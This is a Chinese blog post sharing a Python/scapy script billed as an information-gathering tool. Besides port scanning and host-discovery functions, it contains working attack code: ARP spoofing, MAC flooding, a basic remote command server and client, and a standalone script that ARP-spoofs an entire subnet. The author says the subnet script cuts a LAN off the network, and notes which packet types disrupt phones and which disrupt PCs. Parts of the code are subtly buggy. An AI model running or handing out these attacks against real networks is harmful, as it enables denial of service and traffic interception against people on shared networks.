一个关于信息搜集的python脚本

最新推荐文章于 2024-03-23 08:00:00 发布
最新推荐文章于 2024-03-23 08:00:00 发布
阅读量376 收藏 1
点赞数
分类专栏: python脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44237647/article/details/111300104
版权
本文详细介绍了利用scapy和socket库进行网络扫描,包括端口扫描、主机存活检测、ARP欺骗等技术。通过多线程实现对IP地址范围的批量扫描,支持TCP全连接扫描和半开放扫描,以及UDP扫描。同时,还涵盖了MAC泛洪、服务器和客户端通信的实现。此外,展示了如何进行ARP全网段欺骗,以及其对局域网的影响。
摘要由CSDN通过智能技术生成

通过scapy与socket编写

端口扫描,
主机存活扫描,
mac泛洪,
arp欺骗,
服务器,客户端通信
支持从文件导入ip和手动输入ip
输入支持
a,b某几个ip,port
a-b,某个范围ip,port
1.2.3.0/24 某一个网段

'''
TCP扫描和UDP扫描
UDP扫描先要判断主机是否存活
TCP扫描有两种,通过socket连接扫描和通过SYN半开放扫描
可以通过文件或者输入指定扫描的ip和端口
python3 port_scan
-f filename 指定ip文件名
-i ip 指定*个ip或者一个网段
-p 指定端口,或者端口文件名
-u UDP
-sS TCPSYN扫描
-sT TCP全连接扫描
'''
import sys
import os
import socket
import re
from threading import Thread
from optparse import OptionParser
from scapy.all import *
def TCP_Connect_Port(ip,port):
    try:
        c=socket.socket()
        c.connect((ip,port))
        print("{}:{} online(TCP)".format(ip,port))
    except:
        print("{}:{} not online(TCP)".format(ip,port))
def TCP_Port(ip,port):
    try:
        tcp=IP(dst=ip)/TCP(dport=port,flags='S')
        pkt=sr1(tcp,timeout=1,verbose=0)
        if pkt[TCP].flags == 'SA':
            print(ip+':'+str(port)+' online(TCP)')
            return
        else:
            print(ip+':'+str(port)+' not online(TCP)')
    except Exception as error:
        return
def UDP_Port(ip,port):
    try:
        udp=IP(dst=ip)/UDP(dport=port)
        pkt=sr1(udp,timeout=1,verbose=0)
        if not pkt:
            print(ip+':'+str(port)+' online(UDP)')
            return
        if pkt[IP].proto==1:
            print(ip+':'+' not online(UDP)')
            return
    except Exception as error:
        print(error)
        return
def PORT_Handle(port):
    store=[]
    if len(port.split('-'))==2:
        for i in range(int(port.split('-')[0]),int(port.split('-')[1])+1):
            store.append(i)
        return store
    if len(port.split(','))==1:
        store.append(int(port))
        return store
    if len(port.split(','))>=2:
        for i in range(0,len(port.split(','))):
            store.append(int(port.split(',')[i]))
        return store
def IP_Handle(ip):
    store=[] #  10.102.0.1-10.102.0.2,   10.102.0.1/24   , 10.102.0.1,10.102.0.1
    prefix=ip.split('.')[0]+'.'+ip.split('.')[1]+'.'+ip.split('.')[2]+'.'
    if len(ip.split(','))>=2:
        for i in ip.split(','):
            store.append(i)
        return store
    if ip.split('-'):
        for i in ip.split('-'):
            store.append(i)
        return store
    if ip.split('/'):
        prefix = ip.split('.')[0] + '.' + ip.split('.')[1] + '.' + ip.split('.')[2] + '.'
        for i in range(1,256):
            store.append(prefix+str(i))
        return store
def ARP_Alive(ip): #本机抓不到发出去的包,但是能抓到回复
    try:
        pkt=Ether(dst='ff:ff:ff:ff:ff:ff:ff')/ARP(hwdst='00:00:00:00:00:00:00',op=1,pdst=ip)
        result=sr1p(pkt,timeout=1,verbose=0)
        if result:
            print(ip+' online')
        else:
            print(ip+' not online')
        return
    except Exception as error:
        return
def PING_Alive(ip): #icmp(ping)
    try:
        pkt=IP(dst=ip)/ICMP()
        result=sr1(pkt,verbose=0,timeout=1)
        if result:
            print(ip+' online')
        else:
            print(ip+' not online')
        return
    except:
        return
def TCP_Alive(ip):
    try:
        pkt=IP(dst=ip)/TCP(dport=RandShort(),flags='A')
        result=sr1(pkt,verbose=0,timeout=1)
        if result[TCP].flags=='R':
            print(ip+' online')
            return
        else:
            print(ip+' not online')
            return
    except Exception as error:
        return
def UDP_Alive(ip):
    try:
        pkt=IP(dst=ip)/UDP(dport=RandShort())
        result=sr1(pkt,verbose=0,timeout=1)
        if result[IP].proto==1:
            print(ip+' online')
            return
        else:
            print(ip+' not online')
            return
    except:
        return
def ARP_Spoof(ip,gateway):
    try:
        while True:
            pkt=Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip,psrc=gateway)
            sendp(pkt,verbose=0)
    except KeyboardInterrupt:
            print('ARP_Spoof Over!')
def MAC_Floor(): #本机抓不到包,测试失败
        pkt=Ether(dst=RandMAC(),src=RandMAC())/IP(src=RandIP(),dst=RandIP())/ICMP()
        try:
            sendp(pkt,inter=0.1,count=10000,loop=1)
            return
        except:
            return
def Shell(client):
    while True:
        text=client.recv(10240).strip()
        if text == b'exit':
            client.sendall(b'exit')
            break
        if not text:
            break
        print(text)
        command=input('your input:')
        command=bytes(command,'ascii')
        client.sendall(command)
    print('Connect Close!')
    client.close()
def SHELL_Server(ip, port):
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.bind(((ip,port)))
    s.listen(3) #最多3个排队的
    while True:
        try:
            client,addr=s.accept()
            print('Connected by '+addr[0])
            t=Thread(target=Shell,args=(client,))
            t.start()
        except KeyboardInterrupt : #这里的线程问题不知道怎么解决,当一个连接退出后,会卡在connect close,当使用ctrl+c中断后,会卡住,如果又有申请的连接,才会显示服务器关闭
            break
    print('Server Close!')
    s.close()

def SHELL_Client(ip,port):
    try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect((ip,port))
        while True :
            text=input('please input:')
            text=bytes(text,'ascii')
            s.sendall(text)
            rec=s.recv(10240)
            if not rec :
                continue
            if text==b'exit':
                break
            print(rec)
        s.close()
    except :
        print('Connection reset by server!')
def main():
    usa='Usage: %prog -f <filename> | %prog -i <ip>\n%prog -p <port>\n%prog -sS | -sC | -u'
    pars=OptionParser(usage=usa)
    pars.add_option('-f',type='string',dest='filename',help='ip file')
    pars.add_option('-i',type='string',dest='ip',help='ip *.*.*.0/24')
    pars.add_option('-p',type='string',dest='port',help='port')
    pars.add_option('--arp',type='string',dest='ARP_alive',help='arp_alive')
    pars.add_option('--ping',type='string',dest='PING',help='ping_alive')
    pars.add_option('--th',type='string',dest='TCP_alive',help='tcp_alive')
    pars.add_option('--uh',type='string',dest='UDP_alive',help='udp_alive')
    pars.add_option('-u',action='store_true',dest='udp',help='udp')
    pars.add_option('--sS',action='store_true',dest='TCP_syn',help='tcp syn')
    pars.add_option('--sC',action='store_true',dest='TCP_connect',help='tcp connect')
    pars.add_option('--mf',action='store_true',dest='MAC_floor',help='mac floor')
    pars.add_option('--as',type='string',dest='ARP_spoof',help='arp_spoof')
    pars.add_option('--SS',type='string',dest='SHELL_server',help='shell_server')
    pars.add_option('--SC',type='string',dest='SHELL_client',help='shell_client')
    (options,args)=pars.parse_args()
    ip=options.ip
    filename=options.filename
    port=options.port
    ARP_alive=options.ARP_alive
    PING_alive=options.PING
    UDP_alive=options.UDP_alive
    TCP_alive=options.TCP_alive
    udp=options.udp
    TCP_syn=options.TCP_syn
    TCP_connect=options.TCP_connect
    MAC_floor=options.MAC_floor
    ARP_spoof=options.ARP_spoof
    SHELL_server=options.SHELL_server
    SHELL_client=options.SHELL_client
    # print(port)
    # print(port.split(','))
    # print(type(port.split(',')))
    # test=[]
    # print(type(int(port)))
    # print(port.split(','))
    # test.append(int(port.split(',')[0]))
    # print(test)
    if ((port and filename or ip) and (udp or TCP_syn or TCP_connect)) or ((filename or ip) and (ARP_alive or UDP_alive or TCP_alive or PING_alive or ARP_alive)) or MAC_floor or ARP_spoof or (SHELL_client or SHELL_server):
        if port:
            port=PORT_Handle(port) #返回一个列表
        if filename:
            if os.path.exists(filename):
                if udp:
                    f= open(filename,'r')
                    for i in f.readlines():
                        addr = i.strip()
                        for j in port:
                            t=Thread(target=UDP_Port,args=(addr,j))
                            t.start()
                elif TCP_syn:
                    f= open(filename,'r')
                    for i in f.readlines():
                        addr = i.strip()
                        for j in port:
                            t=Thread(target=TCP_Port,args=(addr,j))
                            t.start()
                elif TCP_connect:
                    f= open(filename,'r')
                    for i in f.readlines():
                        addr = i.strip()
                        for j in port:
                            t=Thread(target=TCP_Connect_Port,args=(addr,j))
                            t.start()
                elif PING_alive:
                    f=open(filename,'r')
                    for i in f.readlines():
                        addr=i.strip()
                        t=Thread(target=PING_Alive,args=(addr,))
                        t.start()
                elif UDP_alive:
                    f=open(filename,'r')
                    for i in f.readlines():
                        addr=i.strip()
                        t=Thread(target=UDP_Alive,args=(addr,))
                        t.start()
                elif  TCP_alive:
                    f=open(filename,'r')
                    for i in f.readlines():
                        addr=i.strip()
                        t=Thread(target=TCP_Alive,args=(addr,))
                        t.start()
                elif ARP_alive:
                    f=open(filename,'r')
                    for i in  f.readlines():
                        addr=i.strip()
                        t=Thread(target=ARP_Alive,args=(addr,))
                        t.start()
            else:
                sys.exit('Filename not Exist!')
        elif ip:
            ip=IP_Handle(ip)#返回一个ip列表
            if udp:
                for i in ip:
                    for j in port:
                        t=Thread(target=UDP_Port,args=(i,j))
                        t.start()
            elif TCP_syn:
                for i in ip:
                    for j in port:
                        t = Thread(target=TCP_Port,args=(i, j))
                        t.start()
            elif TCP_connect:
                for i in ip:
                    for j in port:
                        t = Thread(target=TCP_Connect_Port(),args=(i, j))
                        t.start()
            elif PING_alive:
                for i in ip:
                    t = Thread(target=PING_Alive, args=(i,))
                    t.start()
            elif UDP_alive:
                for i in ip:
                    t = Thread(target=UDP_Alive, args=(i,))
                    t.start()
            elif TCP_alive:
                for i in ip:
                    t = Thread(target=TCP_Alive, args=(i,))
                    t.start()
            elif ARP_alive:
                for i in ip:
                    t = Thread(target=ARP_Alive, args=(i,))
                    t.start()
            else:
                sys.exit('Wrong Format!')
        elif MAC_floor:
            while True:
                MAC_Floor()
        elif ARP_spoof:
            ip=ARP_spoof.split(',')[0]
            gateway=ARP_spoof.split(',')[1]
            ARP_Spoof(ip,gateway)
        elif SHELL_server:
            ip=SHELL_server.split(',')[0]
            port=int(SHELL_server.split(',')[1])
            SHELL_Server(ip,port)
        elif SHELL_client:
            ip = SHELL_client.split(',')[0]
            port = int(SHELL_client.split(',')[1])
            SHELL_Client(ip, port)
        else:
            sys.exit('-h to help!')
    else:
        sys.exit('Lack Param!')
if __name__ =='__main__':
    main()

arp全网段欺骗

可以造成局域网断网,ARP表被修改,ARP欺骗

from scapy.all import *
from threading import Thread
def arp(ip):
    while True:
        pkt1=Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(psrc='10.102.0.1',pdst=ip,op=1)
        pkt2=Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(psrc='10.102.0.1',pdst=ip,op=2)
        #对于手机来说,op=1,好用,对电脑来说op=2才有效
        #电脑可以同时接受两个包,但是手机使用2只能造成网络不稳定,但是1可以造成断网。同时使用不产生影响
        sendp(pkt1)
        sendp(pkt2)
        time.sleep(0.2)
for i in range(2,255):
    string='10.102.0'+str(i)
    t=Thread(target=arp,args=(string,))
    t.start()

这里的ip写死了,可以自己修改,也可以用sys或者optparse写成脚本
#不同的op对手机和电脑的影响不同

冬瓜小暖
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python信息收集
willow_liang的博客
11-03 616
1.收集域名信息 # whois # https://www. tianyancha. com ! 2.收集敏感信息 # site:edu.cn intext:后台 # site:Github. comsmtp @163. com # firefox工作台查找有用信息 # https ://www.exploit-db.com/google-hacking-database 3.收集子域名信息 # fierce -dns baidu.com -threads 10 # site:baidu. com 4.收
使用Python脚本来获取Cisco设备信息的示例
09-22
本文将深入探讨如何使用Python脚本来获取Cisco设备信息,以实现对Cisco交换机的远程管理和监控。通过一个名为`tratto`的简单框架,我们可以轻松地批量执行命令并收集输出结果。 `tratto`框架主要由三个核心文件组成...
python一个信息收集四大件的脚本
weixin_30378623的博客
03-16 234
0x0前言: 带来一首小歌: 之前看了小迪老师讲的课,仔细做了些笔记 然后打算将其写成一个脚本。 0x01准备: requests模块 socket模块 optparser模块 time模块 0x02笔记和思路: 笔记: 信息收集四大件 6.快速判断网站系统类型: 改一个网站后缀名文件,看它对大小写是否敏感 windows:不区分大小写 Linu...
python收集系统信息
baichuo19940724的博客
03-25 203
实现的功能 搜集系统消息,有生产商,CPU型号,核数,内存,主机名,发行版名称 可运行的系统 目前已在RHEL, Ubuntu, Archlinux上测试通过 获取不同发行版主机名逻辑判断思路分析 大家肯定都知道,RHEL的主机名配置文件和Ubuntu的不一样,可是Archlinux的和Ubuntu的又不一样,所以这里就将不同操作系统的主机名配置文件和操作系统的issue做了一个映射 ...
python脚本开发(信息收集)
guanjian_ci的博客
03-07 398
0.先导入相应的模块 1.扫描IP 2.扫描CDN 3.扫描端口 4.扫描whios 5.扫描子域名(注意:需要处理异常,导入dic.txt子域名字典) 6.函数调用 7.进入cmd窗口执行python文件 注意:文章只分享学术内容,乱扫描者后果自行负责!!! ...
Python信息搜集
AYasx的博客
04-06 333
Python信息搜集   1.IP查询 IP查询是通过当前所获取到的URL去查询对应IP地址的过程.可以应用socket库函数中的gethostbuname()获取域名所对应的IP值,代码如下: 查询域名www.biadu.com所对应的IP值,代码如下: import socket   ip = socket.gethostbyname(‘www.biadu.com’)   print(ip)     输出结果:   112.80.248.75   2.whois查询 whois是用来查询域名的ip以及所
通过python脚本收集系统信息
最新发布
05-12
通过python脚本收集系统信息,主要包括以下脚本,值的下载: 1-CPU信息 2-内存信息 3-系统用户及启动时间 4-硬盘使用率采集 5-生成磁盘使用情况的日志文件 6-网络流量采集 7-计算所有进程所占用内存大小之和 8-检查...
随机python脚本
02-09
在本文中,我们将深入探讨“随机python脚本”这一主题,这是从GitHub上收集的一系列Python脚本。这些脚本可能包含各种用途和功能,旨在解决特定问题或演示Python编程的不同方面。首先,我们需要了解Python作为一种...
fio_tests:用于自动化 fio 测试的 Python 脚本
06-09
【fio_tests:用于自动化fio测试的Python脚本】 在IT行业中,性能测试是评估系统硬件、存储设备以及I/O子系统的关键环节。fio(Flexible I/O Tester)是一款强大的开源工具,专为衡量存储系统的性能而设计,支持多种...
Python-Hamburglar从URL目录和文件中收集有用信息Python脚本
08-10
在网络安全领域,信息收集是一个重要的步骤,它能帮助我们了解目标系统的基本情况,如网站结构、文件类型、潜在漏洞等。Python-Hamburglar正是这样一个工具,它通过HTTP请求和解析响应来执行这项任务。以下是它的...
Python自动化信息收集工具
05-28
·网站的真实IP ·端口\端口服务信息 ·网站的“指纹”信息 ·子域名 ·备案信息 ·域名历史解析 ·SSL证书查询 ·域名关联邮箱信息 ·waf探测 ·目录的探测 ·DNS枚举
scapy-python3-0.14
12-11
Python3 scapy模块 scapy-python3-0.14.tar
python脚本看透信息收集工具原理
m0_51581045的博客
04-12 568
最近在学习python脚本写exp与poc,学到利用python库进行一些简单信息收集,也从中看出一些工具的原理,在此做个笔记
python编写web资产信息收集脚本(简单实现)
qq_46041172的博客
06-20 2862
python编写web资产信息收集脚本(简单实现)信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进行。只有我们掌握了目标网站或目标主机足够多的信息之后,我们才能更好地对其进行漏洞检测。在这篇文章中主要介绍实现编写 python 脚本进行主动信息收集。.........
python自写信息收集工具
weixin_44611282的博客
06-01 5506
为了方便渗透过程中的信息收集工作,自己写了一个简单的脚本脚本主要以爬虫为主。深度爬取网站结构,检索出我们需要的数据。 扫描结果: 扫描子域名测试: 测试方法:通过爬取搜索引擎的数据与字典爆破。在字典爆破时为了方式范析式导致的出现大量子域名被解析使用了随机字符串来进行测试。以下为测试代码: try: randstr='Tqzubtuz1op' test = randstr+'.'+self.option['domain']
Python编写一个简单的信息收集工具
2401_82697976的博客
02-09 341
这个示例程序使用`requests`和`BeautifulSoup`库来从给定的URL中提取网页标题、描述和关键词。它首先使用`requests.get()`函数发送HTTP GET请求并获取网页内容,然后使用`BeautifulSoup`解析HTML并提取相关信息。如果发生请求错误或找不到元标签,程序将打印相应的错误消息。
学习Python渗透第十天:用Python实现信息收集
2203_75839317的博客
03-23 1087
信息搜集分为两种:被动扫描和主动扫描被动扫描主要是指在目标无法察觉的情况下进行信息搜集,相比于被动扫描,主动扫描的范围要小的多,主动扫描一般针对目标发送特制的数据包,然后根据目标的反应来获得一些信息。这种扫描方法的技术性比较强,通常可以使用专业的扫描工具来对目标进行扫描。扫描之后获得的信息包括网络的结构,目标网络所使用设备的类型,操作系统,开放的端口,提供的服务等等。
python爬站长之家写一个信息搜集
weixin_30662539的博客
02-20 145
前言:不知道写什么好,绕来绕去还是写回爬虫这一块。 之前的都爬了一遍。这次爬点好用一点的网站。 0x01: 自行备好requests模块 目标站:http://tool.chinaz.com/ 0x2: 代码: import optparse import requests import re import sys from bs4 import BeautifulSou...
python开发-信息收集
huangyongkang666的博客
04-13 414
博客基本内容学自B站小迪安全视频
一个收集文本中runtime字段的python脚本
03-11
好的,我可以回答这个问题。以下是一个收集文本中runtime字段的Python脚本: ``` import re text = "这是一段包含runtime字段的文本,其中runtime为120分钟。" pattern = r"runtime为(\d+)分钟" result = re.search(pattern, text) if result: runtime = result.group(1) print("该文本中的runtime为:" + runtime + "分钟") else: print("该文本中没有找到runtime字段") ``` 这个脚本使用正则表达式匹配文本中的runtime字段,并将其提取出来。如果找到了runtime字段,则输出它的值;否则输出提示信息。希望这个脚本能够帮到你!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值